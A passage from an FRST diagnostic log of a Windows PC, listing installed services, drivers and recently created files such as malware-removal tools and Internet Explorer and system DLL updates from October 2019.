S2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [154584 2014-03-20] (Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6744288 2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
S2 MSSQL$ECC; c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.ECC\MSSQL\Binn\sqlservr.exe [43129288 2012-06-29] (Microsoft Corporation -> Microsoft Corporation)
R2 MSSQL$UPSWS2014SERVER; C:\PROGRAM FILES (X86)\UPS\WSTD\WSDB\MSSQL12.UPSWS2014SERVER\MSSQL\Binn\sqlservr.exe [199760 2018-09-07] (Microsoft Corporation -> Microsoft Corporation)
S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2018-04-27] (Intuit Inc.) [File not signed]
S2 QBVSS; C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [1537536 2018-04-27] (Intuit Inc.) [File not signed]
R3 QuickBooksDB25; C:\Program Files (x86)\Intuit\QuickBooks 2015\QBDBMgrN.exe [827392 2014-08-18] (Intuit, Inc.) [File not signed]
S3 QuickBooksDB28; C:\Program Files (x86)\Intuit\QuickBooks 2018\QBDBMgrN.exe [467968 2018-04-27] (Intuit, Inc.) [File not signed]
R3 QuickBooksDB29; C:\Program Files (x86)\Intuit\QuickBooks 2019\QBDBMgrN.exe [134192 2019-06-07] (Intuit, Inc. -> SAP SE or an SAP affiliate company)
S2 SentinelKeysServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe [369952 2009-09-17] (SafeNet, Inc. -> SafeNet, Inc.)
S2 SentinelProtectionServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe [1246496 2009-09-17] (SafeNet, Inc. -> SafeNet, Inc)
S2 SentinelSecurityRuntime; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Security Runtime\sntlsrtsrvr.exe [292128 2009-09-17] (SafeNet, Inc. -> SafeNet, Inc.)
S4 SQLAgent$ECC; c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.ECC\MSSQL\Binn\SQLAGENT.EXE [379848 2012-06-29] (Microsoft Corporation -> Microsoft Corporation)
S4 SQLAgent$UPSWS2014SERVER; C:\PROGRAM FILES (X86)\UPS\WSTD\WSDB\MSSQL12.UPSWS2014SERVER\MSSQL\Binn\SQLAGENT.EXE [454736 2018-09-07] (Microsoft Corporation -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10945776 2017-12-15] (TeamViewer GmbH -> TeamViewer GmbH)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
S2 WinVNC4; C:\Program Files\RealVNC\VNC4\WinVNC4.exe [2360048 2011-08-18] (RealVNC Ltd -> RealVNC Ltd)
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [487704 2014-03-13] (Intel Corporation -> Intel Corporation)
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2014-05-28] (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [199768 2019-10-08] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [224408 2019-10-08] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [73584 2019-10-08] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [275232 2019-10-08] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [106344 2019-10-08] (Malwarebytes Corporation -> Malwarebytes)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [118272 2014-03-20] (Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation)
R2 Sentinel64; C:\Windows\System32\Drivers\Sentinel64.sys [145448 2009-09-17] (SafeNet, Inc. -> SafeNet, Inc.)
S3 SNTUSB64; C:\Windows\System32\DRIVERS\SNTUSB64.SYS [58792 2009-09-17] (SafeNet, Inc. -> SafeNet, Inc.)
R1 VBoxNetAdp; C:\Windows\System32\DRIVERS\VBoxNetAdp6.sys [119712 2016-04-28] (Oracle Corporation -> Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\System32\DRIVERS\VBoxNetLwf.sys [192352 2016-04-28] (Oracle Corporation -> Oracle Corporation)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [135768 2016-04-28] (Oracle Corporation -> Oracle Corporation)
R3 vncmirror; C:\Windows\System32\DRIVERS\vncmirror.sys [4608 2011-08-18] (Microsoft Windows Hardware Compatibility Publisher -> RealVNC Ltd.)
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-10-08 19:52 - 2019-10-08 19:54 - 000031956 _____ C:\Users\pmcstone\Desktop\FRST.txt
2019-10-08 19:52 - 2019-10-08 19:53 - 000000000 ____D C:\FRST
2019-10-08 19:51 - 2019-10-08 19:51 - 001615872 _____ (Farbar) C:\Users\pmcstone\Desktop\FRST64.exe
2019-10-08 19:44 - 2019-10-08 19:44 - 000003106 _____ C:\Windows\system32\Tasks\AdwCleaner_onReboot
2019-10-08 19:41 - 2019-10-08 19:43 - 000000000 ____D C:\AdwCleaner
2019-10-08 19:41 - 2019-10-08 19:41 - 007636680 _____ (Malwarebytes) C:\Users\pmcstone\Downloads\adwcleaner_7.4.1.exe
2019-10-08 19:10 - 2019-10-08 19:10 - 000275232 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-10-08 19:10 - 2019-10-08 19:10 - 000224408 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-10-08 19:10 - 2019-10-08 19:10 - 000106344 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-10-08 19:10 - 2019-10-08 19:10 - 000073584 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-10-08 19:04 - 2019-10-07 01:49 - 000390752 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2019-10-08 19:04 - 2019-10-07 00:57 - 000341896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2019-10-08 19:04 - 2019-10-05 23:12 - 025753088 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2019-10-08 19:04 - 2019-10-05 23:00 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2019-10-08 19:04 - 2019-10-05 23:00 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2019-10-08 19:04 - 2019-10-05 22:49 - 002909184 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2019-10-08 19:04 - 2019-10-05 22:48 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2019-10-08 19:04 - 2019-10-05 22:47 - 000579584 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2019-10-08 19:04 - 2019-10-05 22:47 - 000417280 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2019-10-08 19:04 - 2019-10-05 22:47 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2019-10-08 19:04 - 2019-10-05 22:46 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2019-10-08 19:04 - 2019-10-05 22:41 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2019-10-08 19:04 - 2019-10-05 22:40 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2019-10-08 19:04 - 2019-10-05 22:38 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2019-10-08 19:04 - 2019-10-05 22:37 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2019-10-08 19:04 - 2019-10-05 22:37 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2019-10-08 19:04 - 2019-10-05 22:36 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2019-10-08 19:04 - 2019-10-05 22:36 - 000797696 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2019-10-08 19:04 - 2019-10-05 22:34 - 005500928 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2019-10-08 19:04 - 2019-10-05 22:32 - 020290048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2019-10-08 19:04 - 2019-10-05 22:31 - 000969216 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2019-10-08 19:04 - 2019-10-05 22:28 - 002724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2019-10-08 19:04 - 2019-10-05 22:28 - 000489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2019-10-08 19:04 - 2019-10-05 22:23 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2019-10-08 19:04 - 2019-10-05 22:22 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2019-10-08 19:04 - 2019-10-05 22:22 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2019-10-08 19:04 - 2019-10-05 22:19 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2019-10-08 19:04 - 2019-10-05 22:19 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2019-10-08 19:04 - 2019-10-05 22:18 - 000496128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2019-10-08 19:04 - 2019-10-05 22:18 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2019-10-08 19:04 - 2019-10-05 22:17 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2019-10-08 19:04 - 2019-10-05 22:17 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2019-10-08 19:04 - 2019-10-05 22:17 - 000047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2019-10-08 19:04 - 2019-10-05 22:16 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2019-10-08 19:04 - 2019-10-05 22:16 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2019-10-08 19:04 - 2019-10-05 22:15 - 002302464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2019-10-08 19:04 - 2019-10-05 22:12 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2019-10-08 19:04 - 2019-10-05 22:12 - 000030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2019-10-08 19:04 - 2019-10-05 22:11 - 000476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2019-10-08 19:04 - 2019-10-05 22:10 - 000663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2019-10-08 19:04 - 2019-10-05 22:10 - 000620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2019-10-08 19:04 - 2019-10-05 22:10 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2019-10-08 19:04 - 2019-10-05 22:07 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2019-10-08 19:04 - 2019-10-05 22:05 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2019-10-08 19:04 - 2019-10-05 22:05 - 000728064 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2019-10-08 19:04 - 2019-10-05 22:03 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2019-10-08 19:04 - 2019-10-05 22:03 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2019-10-08 19:04 - 2019-10-05 22:03 - 000416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2019-10-08 19:04 - 2019-10-05 22:00 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2019-10-08 19:04 - 2019-10-05 22:00 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2019-10-08 19:04 - 2019-10-05 21:59 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2019-10-08 19:04 - 2019-10-05 21:58 - 015413760 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2019-10-08 19:04 - 2019-10-05 21:57 - 004859904 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2019-10-08 19:04 - 2019-10-05 21:57 - 000168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2019-10-08 19:04 - 2019-10-05 21:56 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2019-10-08 19:04 - 2019-10-05 21:56 - 000076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2019-10-08 19:04 - 2019-10-05 21:55 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2019-10-08 19:04 - 2019-10-05 21:53 - 004112384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2019-10-08 19:04 - 2019-10-05 21:50 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2019-10-08 19:04 - 2019-10-05 21:49 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2019-10-08 19:04 - 2019-10-05 21:48 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2019-10-08 19:04 - 2019-10-05 21:48 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2019-10-08 19:04 - 2019-10-05 21:45 - 013808640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2019-10-08 19:04 - 2019-10-05 21:45 - 001566208 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2019-10-08 19:04 - 2019-10-05 21:35 - 004387840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2019-10-08 19:04 - 2019-10-05 21:34 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2019-10-08 19:04 - 2019-10-05 21:32 - 001331712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2019-10-08 19:04 - 2019-10-05 21:30 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2019-10-08 19:04 - 2019-09-18 23:27 - 000168448 _____ (Microsoft Corporation) C:\Windows\system32\umpo.dll
2019-10-08 19:04 - 2019-09-16 21:32 - 004060896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2019-10-08 19:04 - 2019-09-16 21:32 - 003966688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2019-10-08 19:04 - 2019-09-16 21:32 - 000709856 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2019-10-08 19:04 - 2019-09-16 21:32 - 000627424 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2019-10-08 19:04 - 2019-09-16 21:31 - 005552864 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2019-10-08 19:04 - 2019-09-16 21:31 - 001319496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2019-10-08 19:04 - 2019-09-16 21:31 - 000263904 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2019-10-08 19:04 - 2019-09-16 21:31 - 000155360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2019-10-08 19:04 - 2019-09-16 21:31 - 000096992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2019-10-08 19:04 - 2019-09-16 21:30 - 001670784 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000834048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000555520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000275968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000261632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 001472512 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 001211392 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 001162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 001010176 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000733184 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000408576 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000361984 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000236032 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000094208 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\sscore.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2019-10-08 19:04 - 2019-09-16 21:28 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
